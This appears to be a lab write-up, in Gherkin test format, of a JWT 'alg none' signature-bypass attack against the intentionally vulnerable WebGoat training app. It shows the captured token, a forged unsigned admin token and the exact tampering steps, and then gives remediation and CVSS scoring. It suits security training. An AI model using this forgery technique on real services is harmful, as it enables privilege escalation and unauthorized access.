## Version 1.4.1
## language: en

Feature:
  TOE:
    WebGoat
  Location:
    http://localhost/WebGoat/start.mvc#lesson/JWT.lesson/3 - Cookie (Header)
  CWE:
    CWE-522: Insufficiently Protected Credentials
  Goal:
    Reset counter becoming admin by token modification
  Recommendation:
    Enforce verification algorithm as mandatory

  Background:
  Hacker's software:
    | <Software name>    |    <Version>         |
    | Ubuntu             | 18.04 LTS (x64)      |
    | Mozilla Firefox    | 63.0                 |
    | Visual Studio Code | 1.29.1               |
    | Burp Suite CE      | 1.7.36               |
  TOE information:
    Given I'm running WebGoat standalone jar application
    And using java jre1.8.0_181 to run it
    """
    java -jar webgoat-server-8.0.0.M21.jar --server.port=80
    """
    And url "http://localhost/WebGoat/start.mvc#lesson/JWT.lesson/3"
    And I'm accessing the WebGoat site through my browser

  Scenario: Normal use case
  The site allows to select an user and vote for a list
    Given The access to the website url
    And a menu to vote and reset votes counter
    Then I select the user I want to vote with
    And I click on the vote button
    And The vote counter increases
    And I cannot reset votes on the reset button

  Scenario: Static detection
  No backend code is exposed on the website, code embedded into ".class" files

  Scenario: Dynamic detection
  Intercept request parameters
    Given the website url
    Then I use Burp Suite CE along Firefox to intercept for normal use case
    And I see the parameters posted for the reset votes click
    """
    access_token=eyJhbGciOiJIUzUxMiJ9.
    eyJpYXQiOjE1NDY3MDc0NTksImFkbWluIjoiZmFsc2UiLCJ1c2VyIjoiVG9tIn0.
    {132-character-signature}; JSESSIONID=D2995011468364838B6AEB969C1D5E74
    """
    And I use Burp Suite CE to decode the header and payload with base64url
    """
    eyJhbGciOiJIUzUxMiJ9 -> {"alg":"HS512"}
    eyJpYXQiOjE1NDY3MDc0NTksImFkbWluIjoiZmFsc2UiLCJ1c2VyIjoiVG9tIn0
    ->{"iat":1546707459,"admin":"false","user":"TomIn0
    """
    Then I realise I can modify admin value to gain access to reset counter

  Scenario: Exploitation
  Tamper the questions parameters
    Given the website url
    Then I click on reset button and intercept the parameters using Burp
    And I modify the header
    """
    {"alg":"none"}
    """
    And I modify the payload for admin privilege to
    """
    {"iat":1546707459,"admin":"true","user":"Tom"}
    """
    And I reencode the modified data in base64url
    And I forward the edited access token field as
    """
    access_token=eyJhbGciOiJub25lIn0=
    .eyJpYXQiOjE1NDY3MDc0NTksImFkbWluIjoidHJ1ZSIsInVzZXIiOiJUb20ifQ==.
    """
    And I reset the counter [evidence](count-reset.png)

  Scenario: Remediation
  Ensure the verification process has the "HS512" algorithm as mandatory
  """
  {"alg":"HS512"}
  """

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    6.3/10 (Medium) - AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L
  Temporal: Attributes that measure the exploit's popularity and fixability
    4.5/10 (Medium) - E:U/RL:X/RC:U
  Environmental: Unique and relevant attributes to a specific user environment
    5.2/10 (Medium) - CR:H/IR:L/AR:L

  Scenario: Correlations
  No correlations have been found to this date 2018-12-26
